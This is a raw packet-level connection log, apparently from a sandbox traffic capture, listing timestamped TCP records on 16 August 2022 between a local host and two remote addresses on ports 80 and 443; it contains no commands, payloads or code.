                                        Aug 16, 2022 10:48:42.356937885 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.357003927 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.357570887 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.357620001 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.357633114 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.357667923 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.358747959 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.358802080 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.358809948 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.358845949 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.360474110 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.360533953 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.360542059 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.360586882 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.360899925 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.360944033 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.361260891 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.361305952 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.361798048 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.361840010 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.361861944 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.361897945 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.362597942 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.362663031 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.362670898 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.362706900 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.499169111 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499196053 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499218941 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499242067 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499264002 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499278069 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499288082 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499310970 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499315023 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499332905 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499367952 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499367952 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499391079 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499393940 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499428034 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499432087 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499483109 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499505043 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499520063 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499531984 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499542952 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499566078 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499572039 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499593973 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499597073 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499629021 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.499701977 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.499706984 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.502167940 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.505269051 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.541024923 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.541043997 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.541119099 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.541347027 CEST4917480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.542623997 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.571373940 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.571434021 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.727580070 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727627993 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727665901 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727664948 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727694035 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727705002 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727718115 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727744102 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727747917 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727782011 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727796078 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727821112 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727828026 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727859974 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727880001 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727900982 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727911949 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727941036 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727943897 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.727977037 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.727993965 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.728017092 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.728023052 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.728055954 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.728069067 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.728089094 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.728106976 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.728147030 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.733304024 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.733989000 CEST4917680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.735450983 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.757163048 CEST8049174187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.776794910 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.776899099 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.777533054 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.779373884 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.779447079 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.810466051 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.810481071 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.810491085 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.810575008 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.811070919 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.811629057 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.812107086 CEST49180443192.168.2.22142.250.181.238
                                        Aug 16, 2022 10:48:42.812118053 CEST44349180142.250.181.238192.168.2.22
                                        Aug 16, 2022 10:48:42.947345972 CEST8049176187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.965703964 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:42.965835094 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:42.966952085 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.016552925 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024678946 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024712086 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024735928 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024760008 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024780989 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.024810076 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.024846077 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.027270079 CEST4918180192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.031986952 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.205545902 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205640078 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205693007 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205709934 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.205734968 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.205800056 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205820084 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205837011 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.205837011 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.205851078 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.205872059 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.207338095 CEST4918280192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.208395958 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.259557009 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.259646893 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.260390997 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.264482021 CEST8049181187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.432960987 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.437179089 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.437861919 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.445528984 CEST8049182187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.487986088 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.491091967 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.491141081 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.491199017 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.491229057 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.491379023 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.493733883 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.493761063 CEST4918380192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.496129990 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.665122032 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665373087 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665484905 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.665512085 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665648937 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665668011 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.665704012 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.665735006 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665884018 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.665946007 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.666008949 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.666076899 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.666163921 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.666225910 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.666366100 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.666568041 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.666644096 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.666743994 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.666935921 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.666975021 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.668477058 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.709305048 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.709564924 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.710464001 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.721340895 CEST8049183187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.897418976 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.897468090 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.897574902 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.899447918 CEST4918480192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.900391102 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.929192066 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936249018 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936311960 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936347961 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936361074 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936384916 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936388969 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936393976 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936420918 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936433077 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936453104 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936474085 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936486959 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936501026 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936520100 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936534882 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936552048 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936569929 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936585903 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:43.936602116 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.936636925 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:43.938524961 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.111465931 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.111566067 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.116972923 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.121037006 CEST8049184187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153158903 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153206110 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153245926 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153249025 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153270960 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153285027 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153289080 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153327942 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153570890 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153620005 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153645039 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153659105 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153667927 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153698921 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153709888 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153739929 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153747082 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153778076 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153788090 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153819084 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153829098 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153858900 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153875113 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153892040 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153897047 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153906107 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153934956 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.153944016 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.153985977 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.154861927 CEST4918580192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.156163931 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.328499079 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.372730017 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.372837067 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.373161077 CEST8049185187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:44.373410940 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:44.589329004 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.200921059 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.201005936 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.201045036 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.201080084 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.201090097 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.201131105 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.201136112 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.201138973 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.203442097 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.203485012 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.203524113 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.203536987 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.203556061 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.203562021 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.203568935 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.203610897 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.210089922 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.210134029 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.210160017 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.210191965 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.412224054 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412247896 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412264109 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412281036 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412297010 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412313938 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412327051 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.412334919 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412352085 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.412357092 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.412362099 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.412365913 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.412386894 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.414510012 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414530993 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414549112 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414565086 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414604902 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.414617062 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.414872885 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414890051 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414904118 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.414942980 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.414951086 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.414969921 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.524857998 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524883032 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524899960 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524914026 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524930954 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524946928 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.524981022 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.525013924 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.525573969 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.525588036 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.525659084 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.533633947 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.533674002 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.533786058 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.558244944 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.558290005 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.558300018 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.558325052 CEST4918680192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740700006 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740741014 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740776062 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740777969 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740808964 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740840912 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740848064 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740852118 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740890980 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740895033 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740920067 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.740969896 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.740987062 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741031885 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741054058 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741090059 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741106987 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741122007 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741123915 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741169930 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741286039 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741322041 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741326094 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741357088 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741364956 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741398096 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741611958 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741640091 CEST8049187187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.741658926 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.741688967 CEST4918780192.168.2.22187.45.240.69
                                        Aug 16, 2022 10:48:45.771792889 CEST8049186187.45.240.69192.168.2.22
                                        Aug 16, 2022 10:48:45.771841049 CEST4918680192.168.2.22187.45.240.69
